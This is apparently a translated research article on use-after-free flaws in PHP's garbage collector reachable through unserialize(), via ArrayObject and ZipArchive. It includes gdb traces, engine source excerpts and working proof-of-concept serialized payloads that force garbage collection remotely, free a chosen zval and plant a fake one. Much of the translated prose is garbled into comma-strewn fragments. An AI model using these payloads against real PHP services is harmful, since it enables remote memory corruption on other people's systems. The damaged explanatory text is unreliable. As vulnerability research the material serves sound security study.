$serialized_string = 'a:1:{i:1;C:11:"ArrayObject":37:{x:i:0;a:2:{i:1;R:4;i:2;r:1;};m:a:0:{}}}'; $outer_array = unserialize($serialized_string); gc_collect_cycles(); $filler1 = "aaaa"; $filler2 = "bbbb"; var_dump($outer_array); // Result: // string(4) "bbbb"
array(1) { // [1]=> object(ArrayObject)#1 (1) { ["storage":"ArrayObject":private]=> array(2) { // [1]=> // [2]=> // } } }
$outer_array
) is released, and its zval is overwritten by zval'om $filler2
. And as a result, we get bbbb
. The following questions arise:gc_collect_cycles()
and is it really necessary to call it manually? This is very inconvenient for remote use, because many scripts and installations do not call this function at all.gc_collect_cycles
function, which calls the PHP garbage collector. We need to better understand it in order to deal with this mysterious example.zend.enable_gc
setting in php.ini
. $test = array(); $test[0] = &$test; unset($test);
$test
refers to itself, its reference count is 2. But even if you unset($test)
and the count equals 1, the memory will not be released: a leak will occur. To solve this problem, the PHP developers created the CM algorithm in accordance with the IBM “ Concurrent Cycle Collection in Reference Counted Systems ”.gc_zval_possible_root
. Any such potential zval is called root and is added to the gc_root_buffer
list.gc_zval_possible_root
, and that one will already call gc_collect_cycles
to process and clear the current buffer so that new items can be stored.gc_collect_cycles
: "Zend/zend_gc.c" [...] ZEND_API int gc_collect_cycles(TSRMLS_D) { [...] gc_mark_roots(TSRMLS_C); gc_scan_roots(TSRMLS_C); gc_collect_roots(TSRMLS_C); [...] /* Free zvals */ p = GC_G(free_list); while (p != FREE_LIST_END) { q = p->u.next; FREE_ZVAL_EX(&p->z); p = q; } [...] }
gc_mark_roots(TSRMLS_C)
: apply zval_mark_grey
to all magenta elements in gc_root_buffer
. With respect to the current zval, zval_mark_grey
does the following:zval_mark_grey
.gc_collect_roots(TSRMLS_C)
: all white zval link counters are restored. They are also added to the gc_zval_to_free
list, equivalent to the gc_free_list
list.gc_free_list
elements, i.e., marked with white, are released.zval_mark_grey
decrements the counters of all child zvals before checking them for gray marking. $serialized_string = 'a:1:{i:1;C:11:"ArrayObject":37:{x:i:0;a:2:{i:1;R:4;i:2;r:1;};m:a:0:{}}}';
define dumpgc set $current = gc_globals.roots.next printf "GC buffer content:\n" while $current != &gc_globals.roots printzv $current.u.pz set $current = $current.next end end
gc_mark_roots
and gc_scan_roots
to see the status of all relevant reference counters. (gdb) r poc1.php [...] Breakpoint 1, gc_mark_roots () at [...] (gdb) dumpgc GC roots buffer content: [0x109f4b0] (refcount=2) array(1): { // outer_array 1 => [0x109d5c0] (refcount=1) object(ArrayObject) #1 } [0x109ea20] (refcount=2,is_ref) array(2): { // inner_array 1 => [0x109ea20] (refcount=2,is_ref) array(2): // reference to inner_array 2 => [0x109f4b0] (refcount=2) array(1): // reference to outer_array }
gc_scan_roots
, we get the following states of reference counters: (gdb) c [...] Breakpoint 2, gc_scan_roots () at [...] (gdb) dumpgc GC roots buffer content: [0x109f4b0] (refcount=0) array(1): { // 1 => [0x109d5c0] (refcount=0) object(ArrayObject) #1 }
gc_mark_roots
really decremented all counters to zero. Therefore, these nodes in the following steps can be marked white and later released. But the question arises: why in the first case, the counters were reset?gc_mark_roots
and zval_mark_grey
to understand what is happening.zval_mark_grey
applied to outer_array
(remember that outer_array
added to the garbage collection buffer).outer_array
marked gray, and all its descendants are extracted. In our case, outer_array
only one descendant:“object(ArrayObject) #1”
(refcount = 1).ArrayObject
decremented:“object(ArrayObject) #1”
(refcount = 0).zval_mark_grey
applied to an ArrayObject
.inner_array
and outer_array
.zval_mark_grey
applied to outer_array without any effect, because outer_array is already grayed out (it was processed in the second stage).zval_mark_grey
applied to inner_array. It is marked gray, and all its children are extracted. Children are the same as in the fifth stage.zval_mark_grey
interrupted.inner_array
or ArrayObject
are decremented twice ! This is definitely an unexpected behavior, because any link must be decremented one time. In particular, the eighth stage should not be at all, because all elements have already been processed and marked earlier, at the sixth stage. "Zend/zend_gc.c" [...] static void zval_mark_grey(zval *pz TSRMLS_DC) { [...] if (Z_TYPE_P(pz) == IS_OBJECT && EG(objects_store).object_buckets) { if (EXPECTED(EG(objects_store).object_buckets[Z_OBJ_HANDLE_P(pz)].valid && (get_gc = Z_OBJ_HANDLER_P(pz, get_gc)) != NULL)) { [...] HashTable *props = get_gc(pz, &table, &n TSRMLS_CC); [...] }
get_gc
special handler. It must return a hash table with all descendants. After further debugging, I discovered that this leads to the spl_array_get_properties
call: "ext/spl/spl_array.c" [...] static HashTable *spl_array_get_properties(zval *object TSRMLS_DC) /* {{{ */ { [...] result = spl_array_get_hash_table(intern, 1 TSRMLS_CC); [...] return result; }
ArrayObject
internal array is ArrayObject
. The error is that it is used in two different contexts when the algorithm tries to gain access:zval' ArrayObject
;inner_array
.inner_array
hash table is almost the same as processing at the first stage, when it should be marked in gray, therefore inner_array
should not be processed again in the second stage!inner_array
not grayed out at the first stage? Let's look again at how zval_mark_grey
retrieves the descendants of the parent object: HashTable *props = get_gc(pz, &table, &n TSRMLS_CC);
"ext/spl/php_date.c" [...] static HashTable *date_object_get_gc(zval *object, zval ***table, int *n TSRMLS_DC) { *table = NULL; *n = 0; return zend_std_get_properties(object TSRMLS_CC); }
table
, which is passed by reference and is used as the second "return parameter". This zval must contain all the zvals referenced by the object in other contexts. For example, all objects / zval'y can be stored in SplObjectStorage
.ArrayObject
we can expect that the zval table
will contain an inner_array
. Then why is spl_array_get_gc
called instead of spl_array_get_properties
?spl_array_get_gc
does not exist! PHP developers have forgotten to implement the garbage collection function for ArrayObjects
. But it still does not explain why spl_array_get_properties
is spl_array_get_properties
. To find out, let's deal with the initialization of objects in general: "Zend/zend_object_handlers.c" [...] ZEND_API HashTable *zend_std_get_gc(zval *object, zval ***table, int *n TSRMLS_DC) /* {{{ */ { if (Z_OBJ_HANDLER_P(object, get_properties) != zend_std_get_properties) { *table = NULL; *n = 0; return Z_OBJ_HANDLER_P(object, get_properties)(object TSRMLS_CC); [...] }
get_properties
object's own method, if specified.ArrayObjects
.gc_collect_cycles
? define("GC_ROOT_BUFFER_MAX_ENTRIES", 10000); define("NUM_TRIGGER_GC_ELEMENTS", GC_ROOT_BUFFER_MAX_ENTRIES+5); $overflow_gc_buffer = str_repeat('i:0;a:0:{}', NUM_TRIGGER_GC_ELEMENTS); $trigger_gc_serialized_string = 'a:'.(NUM_TRIGGER_GC_ELEMENTS).':{'.$overflow_gc_buffer.'}'; unserialize($trigger_gc_serialized_string);
gc_collect_cycles
indeed called. This trick only works because deserialization allows you to transfer the same index many times (in this example, index 0). When reusing an array index, the reference count of the old element must be decremented. To do this, the deserialization process calls zend_hash_update
, which calls the destructor of the old element.gc_collect_cycles
will be called.var_hash
list. And when deserialization comes to an end, the records are destroyed using the var_destroy
function. $reference_count_test = unserialize('a:2:{i:0;i:1337;i:1;r:2;}'); debug_zval_dump($reference_count_test); /* Result: array(2) refcount(2){ [0]=> long(1337) refcount(2) [1]=> long(1337) refcount(2) } */
var_destroy
call) and var_hash
contents of the var_hash
, we will see the following counter values: [0x109e820] (refcount=2) array(2): { 0 => [0x109cf70] (refcount=4) long: 1337 1 => [0x109cf70] (refcount=4) long: 1337 }
ArrayObject
function takes a reference to another array for initialization. That is, if you deserialize ArrayObject
, you can simply refer to any array that is already deserialized. This allows decrementing all records of a specific hash table twice. The sequence of actions is as follows:array(ref_to_X, ref_to_X, […], ref_to_X)
ArrayObject
that will be initialized with the contents of the Y array. Therefore, it will return all descendants of the Y array when processed by the garbage collector marking algorithm.ArrayObject
with the same settings as the previous one.ArrayObject
, it starts decrementing all references in the Y array for the third time. Now we can get the negative delta of the reference counter and reset the counter of any target zval!ArrayObject
are used for decrementing counters, I will now call them DecrementorObject
.gc_mark_roots
zval_mark_grey
, zval' 0.gc_scan_roots
, , zval' , . zval ( 0).DecrementorObject
', , 0, . , zval DecrementorObject
'. , .DecrementorObject
' zval_mark_grey
. , : array( ref_to_X, ref_to_X, DecrementorObject, DecrementorObject) ----- ------------------------------------ /* | | target_zval each one is initialized with the X contents of array X */
DecrementorObject
' . , , gc_mark_roots
zval'. : define("GC_ROOT_BUFFER_MAX_ENTRIES", 10000); define("NUM_TRIGGER_GC_ELEMENTS", GC_ROOT_BUFFER_MAX_ENTRIES+5); // . $overflow_gc_buffer = str_repeat('i:0;a:0:{}', NUM_TRIGGER_GC_ELEMENTS); // decrementor_object ($free_me). $decrementor_object = 'C:11:"ArrayObject":19:{x:i:0;r:3;;m:a:0:{}}'; // $free_me (id=3). $target_references = 'i:0;r:3;i:1;r:3;i:2;r:3;i:3;r:3;'; // , . . , . $free_me = 'a:7:{'.$target_references.'i:9;'.$decrementor_object.'i:99;'.$decrementor_object.'i:999;'.$decrementor_object.'}'; // 2 decrementor_object. $adjust_rcs = 'i:99;a:3:{i:0;r:8;i:1;r:12;i:2;r:16;}'; // . $trigger_gc = 'i:0;a:'.(2 + NUM_TRIGGER_GC_ELEMENTS).':{i:0;'.$free_me.$adjust_rcs.$overflow_gc_buffer.'}'; // . $payload = 'a:2:{'.$trigger_gc.'i:0;r:3;}'; var_dump(unserialize($payload)); /* Result: array(1) { [0]=> int(140531288870456) } */
gc_collect_roots
! ( $free_me
) , , .var_destroy
, . . zval' — — . define("GC_ROOT_BUFFER_MAX_ENTRIES", 10000); define("NUM_TRIGGER_GC_ELEMENTS", GC_ROOT_BUFFER_MAX_ENTRIES+5); // zval', . $fake_zval_string = pack("Q", 1337).pack("Q", 0).str_repeat("\x01", 8); $encoded_string = str_replace("%", "\\", urlencode($fake_zval_string)); $fake_zval_string = 'S:'.strlen($fake_zval_string).':"'.$encoded_string.'";'; // «» : // TRIGGER_GC;FILL_FREED_SPACE;[...];TRIGGER_GC;FILL_FREED_SPACE $overflow_gc_buffer = ''; for($i = 0; $i < NUM_TRIGGER_GC_ELEMENTS; $i++) { $overflow_gc_buffer .= 'i:0;a:0:{}'; $overflow_gc_buffer .= 'i:'.$i.';'.$fake_zval_string; } // decrementor_object ($free_me). $decrementor_object = 'C:11:"ArrayObject":19:{x:i:0;r:3;;m:a:0:{}}'; // $free_me (id=3). $target_references = 'i:0;r:3;i:1;r:3;i:2;r:3;i:3;r:3;'; // , . . , . $free_me = 'a:7:{i:9;'.$decrementor_object.'i:99;'.$decrementor_object.'i:999;'.$decrementor_object.$target_references.'}'; // 2 decrementor_object. $adjust_rcs = 'i:99999;a:3:{i:0;r:4;i:1;r:8;i:2;r:12;}'; // . $trigger_gc = 'i:0;a:'.(2 + NUM_TRIGGER_GC_ELEMENTS*2).':{i:0;'.$free_me.$adjust_rcs.$overflow_gc_buffer.'}'; // . $stabilize_fake_zval_string = 'i:0;r:4;i:1;r:4;i:2;r:4;i:3;r:4;'; $payload = 'a:6:{'.$trigger_gc.$stabilize_fake_zval_string.'i:4;r:8;}'; $a = unserialize($payload); var_dump($a); /* Result: array(5) { [...] [4]=> int(1337) } */
php_zip_get_properties
. - . : $serialized_string = 'a:1:{i:0;a:3:{i:1;N;i:2;O:10:"ZipArchive":1:{s:8:"filename";i:1337;}i:1;R:5;}}'; $array = unserialize($serialized_string); gc_collect_cycles(); $filler1 = "aaaa"; $filler2 = "bbbb"; var_dump($array[0]); /* Result: array(2) { [1]=> string(4) "bbbb" [...] */
[...] i:1;N; [...] s:8:"filename";i:1337; [...] i:1;R:REF_TO_FILENAME; [...]
Source: https://habr.com/ru/post/308242/
All Articles